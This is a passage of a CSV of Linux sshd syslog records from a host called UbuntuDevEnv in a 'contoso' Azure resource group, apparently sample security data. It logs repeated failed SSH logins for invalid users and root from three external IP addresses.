+8711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:44,UbuntuDevEnv,2019-06-25 21:51:44,auth,UbuntuDevEnv,info,Failed password for invalid user keiv from 212.156.136.114 port 48669 ssh2,36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,keiv,212.156.136.1,48669,,
+8712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:45,UbuntuDevEnv,2019-06-25 21:51:44,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 48669:11: Bye Bye [preauth],36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,48669,,
+8713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:45,UbuntuDevEnv,2019-06-25 21:51:44,auth,UbuntuDevEnv,info,Disconnected from invalid user keiv 212.156.136.114 port 48669 [preauth],36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,keiv,212.156.136.1,48669,,
+8714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:50,UbuntuDevEnv,2019-06-25 21:51:49,auth,UbuntuDevEnv,info,Invalid user cui from 165.22.96.224 port 36618,36929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cui,165.22.96.2,36618,,
+8715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:50,UbuntuDevEnv,2019-06-25 21:51:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:50,UbuntuDevEnv,2019-06-25 21:51:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,36929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:52,UbuntuDevEnv,2019-06-25 21:51:51,auth,UbuntuDevEnv,info,Failed password for invalid user cui from 165.22.96.224 port 36618 ssh2,36929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cui,165.22.96.2,36618,,
+8718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:52,UbuntuDevEnv,2019-06-25 21:51:51,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 36618:11: Bye Bye [preauth],36929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,36618,,
+8719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:51:52,UbuntuDevEnv,2019-06-25 21:51:51,auth,UbuntuDevEnv,info,Disconnected from invalid user cui 165.22.96.224 port 36618 [preauth],36929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cui,165.22.96.2,36618,,
+8720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:52:01,UbuntuDevEnv,2019-06-25 21:52:00,auth,UbuntuDevEnv,info,Invalid user factorio from 134.209.233.74 port 41926,36971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,factorio,134.209.233.7,41926,,
+8721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:52:01,UbuntuDevEnv,2019-06-25 21:52:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,36971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:52:01,UbuntuDevEnv,2019-06-25 21:52:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:52:03,UbuntuDevEnv,2019-06-25 21:52:02,auth,UbuntuDevEnv,info,Failed password for invalid user factorio from 134.209.233.74 port 41926 ssh2,36971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,factorio,134.209.233.7,41926,,
+8724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:52:03,UbuntuDevEnv,2019-06-25 21:52:02,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 41926:11: Bye Bye [preauth],36971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,41926,,
+8725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:52:03,UbuntuDevEnv,2019-06-25 21:52:02,auth,UbuntuDevEnv,info,Disconnected from invalid user factorio 134.209.233.74 port 41926 [preauth],36971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,factorio,134.209.233.7,41926,,
+8726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:16,UbuntuDevEnv,2019-06-25 21:53:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114  user=root,37236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,212.156.136.1,,0,
+8727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:17,UbuntuDevEnv,2019-06-25 21:53:17,auth,UbuntuDevEnv,info,Failed password for root from 212.156.136.114 port 8207 ssh2,37236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,8207,,
+8728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:17,UbuntuDevEnv,2019-06-25 21:53:17,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 8207:11: Bye Bye [preauth],37236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,8207,,
+8729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:17,UbuntuDevEnv,2019-06-25 21:53:17,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 212.156.136.114 port 8207 [preauth],37236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,212.156.136.1,8207,,
+8730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:24,UbuntuDevEnv,2019-06-25 21:53:23,auth,UbuntuDevEnv,info,Invalid user nwes from 134.209.233.74 port 58984,37262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nwes,134.209.233.7,58984,,
+8731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:24,UbuntuDevEnv,2019-06-25 21:53:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:24,UbuntuDevEnv,2019-06-25 21:53:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,37262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:26,UbuntuDevEnv,2019-06-25 21:53:25,auth,UbuntuDevEnv,info,Failed password for invalid user nwes from 134.209.233.74 port 58984 ssh2,37262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nwes,134.209.233.7,58984,,
+8734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:26,UbuntuDevEnv,2019-06-25 21:53:25,auth,UbuntuDevEnv,info,Disconnected from invalid user nwes 134.209.233.74 port 58984 [preauth],37262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nwes,134.209.233.7,58984,,
+8735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:26,UbuntuDevEnv,2019-06-25 21:53:25,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 58984:11: Bye Bye [preauth],37262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,58984,,
+8736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:29,UbuntuDevEnv,2019-06-25 21:53:28,auth,UbuntuDevEnv,info,Invalid user site from 165.22.96.224 port 56424,37284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,site,165.22.96.2,56424,,
+8737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:29,UbuntuDevEnv,2019-06-25 21:53:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:29,UbuntuDevEnv,2019-06-25 21:53:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,37284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:31,UbuntuDevEnv,2019-06-25 21:53:31,auth,UbuntuDevEnv,info,Failed password for invalid user site from 165.22.96.224 port 56424 ssh2,37284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,site,165.22.96.2,56424,,
+8740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:31,UbuntuDevEnv,2019-06-25 21:53:31,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 56424:11: Bye Bye [preauth],37284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,56424,,
+8741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:53:31,UbuntuDevEnv,2019-06-25 21:53:31,auth,UbuntuDevEnv,info,Disconnected from invalid user site 165.22.96.224 port 56424 [preauth],37284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,site,165.22.96.2,56424,,
+8742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:46,UbuntuDevEnv,2019-06-25 21:54:46,auth,UbuntuDevEnv,info,Invalid user jesus from 134.209.233.74 port 47820,37563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesus,134.209.233.7,47820,,
+8743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:46,UbuntuDevEnv,2019-06-25 21:54:46,auth,UbuntuDevEnv,info,Invalid user xavier from 212.156.136.114 port 51366,37561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,212.156.136.1,51366,,
+8744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:46,UbuntuDevEnv,2019-06-25 21:54:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:46,UbuntuDevEnv,2019-06-25 21:54:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,37561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:46,UbuntuDevEnv,2019-06-25 21:54:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:46,UbuntuDevEnv,2019-06-25 21:54:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,37563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:49,UbuntuDevEnv,2019-06-25 21:54:48,auth,UbuntuDevEnv,info,Failed password for invalid user xavier from 212.156.136.114 port 51366 ssh2,37561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,212.156.136.1,51366,,
+8749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:49,UbuntuDevEnv,2019-06-25 21:54:48,auth,UbuntuDevEnv,info,Failed password for invalid user jesus from 134.209.233.74 port 47820 ssh2,37563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesus,134.209.233.7,47820,,
+8750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:49,UbuntuDevEnv,2019-06-25 21:54:48,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 47820:11: Bye Bye [preauth],37563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,47820,,
+8751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:49,UbuntuDevEnv,2019-06-25 21:54:48,auth,UbuntuDevEnv,info,Disconnected from invalid user jesus 134.209.233.74 port 47820 [preauth],37563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesus,134.209.233.7,47820,,
+8752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:49,UbuntuDevEnv,2019-06-25 21:54:48,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 51366:11: Bye Bye [preauth],37561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,51366,,
+8753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:54:49,UbuntuDevEnv,2019-06-25 21:54:48,auth,UbuntuDevEnv,info,Disconnected from invalid user xavier 212.156.136.114 port 51366 [preauth],37561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,212.156.136.1,51366,,
+8754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:55:10,UbuntuDevEnv,2019-06-25 21:55:10,auth,UbuntuDevEnv,info,Invalid user clerk from 165.22.96.224 port 46702,37646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clerk,165.22.96.2,46702,,
+8755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:55:10,UbuntuDevEnv,2019-06-25 21:55:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:55:10,UbuntuDevEnv,2019-06-25 21:55:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,37646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:55:12,UbuntuDevEnv,2019-06-25 21:55:12,auth,UbuntuDevEnv,info,Failed password for invalid user clerk from 165.22.96.224 port 46702 ssh2,37646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clerk,165.22.96.2,46702,,
+8758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:55:12,UbuntuDevEnv,2019-06-25 21:55:12,auth,UbuntuDevEnv,info,Disconnected from invalid user clerk 165.22.96.224 port 46702 [preauth],37646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clerk,165.22.96.2,46702,,
+8759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:55:12,UbuntuDevEnv,2019-06-25 21:55:12,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 46702:11: Bye Bye [preauth],37646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,46702,,
+8760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:12,UbuntuDevEnv,2019-06-25 21:56:11,auth,UbuntuDevEnv,info,Invalid user recepcion from 134.209.233.74 port 36646,37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,recepcion,134.209.233.7,36646,,
+8761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:12,UbuntuDevEnv,2019-06-25 21:56:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:12,UbuntuDevEnv,2019-06-25 21:56:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:14,UbuntuDevEnv,2019-06-25 21:56:13,auth,UbuntuDevEnv,info,Failed password for invalid user recepcion from 134.209.233.74 port 36646 ssh2,37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,recepcion,134.209.233.7,36646,,
+8764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:14,UbuntuDevEnv,2019-06-25 21:56:13,auth,UbuntuDevEnv,info,Disconnected from invalid user recepcion 134.209.233.74 port 36646 [preauth],37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,recepcion,134.209.233.7,36646,,
+8765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:14,UbuntuDevEnv,2019-06-25 21:56:13,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 36646:11: Bye Bye [preauth],37875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,36646,,
+8766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:18,UbuntuDevEnv,2019-06-25 21:56:18,auth,UbuntuDevEnv,info,Invalid user apitest from 212.156.136.114 port 51801,37895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apitest,212.156.136.1,51801,,
+8767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:18,UbuntuDevEnv,2019-06-25 21:56:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,37895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:18,UbuntuDevEnv,2019-06-25 21:56:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:21,UbuntuDevEnv,2019-06-25 21:56:20,auth,UbuntuDevEnv,info,Failed password for invalid user apitest from 212.156.136.114 port 51801 ssh2,37895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apitest,212.156.136.1,51801,,
+8770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:56:21,UbuntuDevEnv,2019-06-25 21:56:20,auth,UbuntuDevEnv,info,Disconnected from invalid user apitest 212.156.136.114 port 51801 [preauth],37895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apitest,212.156.136.1,51801,,
